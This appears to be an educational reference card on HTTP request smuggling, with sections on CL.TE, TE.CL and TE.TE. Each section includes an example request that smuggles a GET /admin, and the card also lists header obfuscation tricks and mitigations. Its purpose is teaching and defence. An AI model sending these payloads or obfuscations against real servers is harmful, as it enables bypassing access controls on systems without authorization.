HTTP Request Smuggling Reference Card
A comprehensive reference card with key HTTP request smuggling patterns, techniques, and mitigation strategies. Download it as a PDF for offline reference.
HTTP Request Smuggling Reference Card
HTTP Request Smuggling Reference Card
A quick reference guide to common attack patterns
CL.TE Attack Pattern
Content-Length frontend, Transfer-Encoding backend
Description:
Frontend server uses Content-Length, backend uses Transfer-Encoding. Frontend forwards the complete request based on Content-Length, but backend processes it as chunked.
POST /example HTTP/1.1 Host: example.com Content-Length: 57 Transfer-Encoding: chunked 0 GET /admin HTTP/1.1 Host: example.com X
Impact:
Backend sees two requests: an empty chunked request and a smuggled GET request to /admin that bypasses frontend controls.
TE.CL Attack Pattern
Transfer-Encoding frontend, Content-Length backend
Description:
Frontend server uses Transfer-Encoding, backend uses Content-Length. Frontend processes the request as chunked, but backend uses Content-Length.
POST /example HTTP/1.1 Host: example.com Content-Length: 4 Transfer-Encoding: chunked 12 GET /admin HTTP/1.1 0
Impact:
Frontend processes the complete chunked request, but backend only processes the first 4 bytes, leaving the rest as a new request.
TE.TE Attack Pattern
Different Transfer-Encoding interpretations
Description:
Both servers use Transfer-Encoding but interpret it differently due to obfuscation or implementation differences.
POST /example HTTP/1.1 Host: example.com Transfer-Encoding: chunked Transfer-Encoding: identity 0 GET /admin HTTP/1.1 Host: example.com
Impact:
One server might honor the first header while another honors the last, leading to different request interpretations.
Obfuscation Techniques
Methods to bypass security controls
Common techniques:
- Case variations:
Transfer-Encodingvstransfer-encoding - Header value obfuscation:
chunkedvschu\nked - Multiple headers:
Transfer-Encoding: gzip, chunked - Unusual whitespace:
Transfer-Encoding:\tchunked - Header splitting:
X: y\r\nTransfer-Encoding: chunked
Mitigation Strategies
Server Configuration:
- Disable reuse of backend connections
- Use HTTP/2 for backend connections
- Ensure consistent HTTP parsing across servers
- Add a fixed Content-Length header to backend requests
Request Validation:
- Reject requests with ambiguous headers
- Normalize Transfer-Encoding and Content-Length headers
- Implement strict HTTP request parsing
- Use WAF rules to detect smuggling patterns
© 2025 Learn Web Basics | For educational purposes only
This reference card provides a quick overview of common HTTP request smuggling patterns, techniques, and mitigation strategies. Download it as a PDF for offline reference.
How to Use This Reference Card
This reference card is designed to be a quick reference guide for security professionals, penetration testers, and web developers. It provides a concise overview of common HTTP request smuggling patterns, techniques, and mitigation strategies.
For security professionals: Use this card during security assessments to identify potential HTTP request smuggling vulnerabilities.
For developers: Reference this card when implementing security controls to prevent HTTP request smuggling attacks.
For students: Study this card to understand the mechanics of HTTP request smuggling and how to prevent it.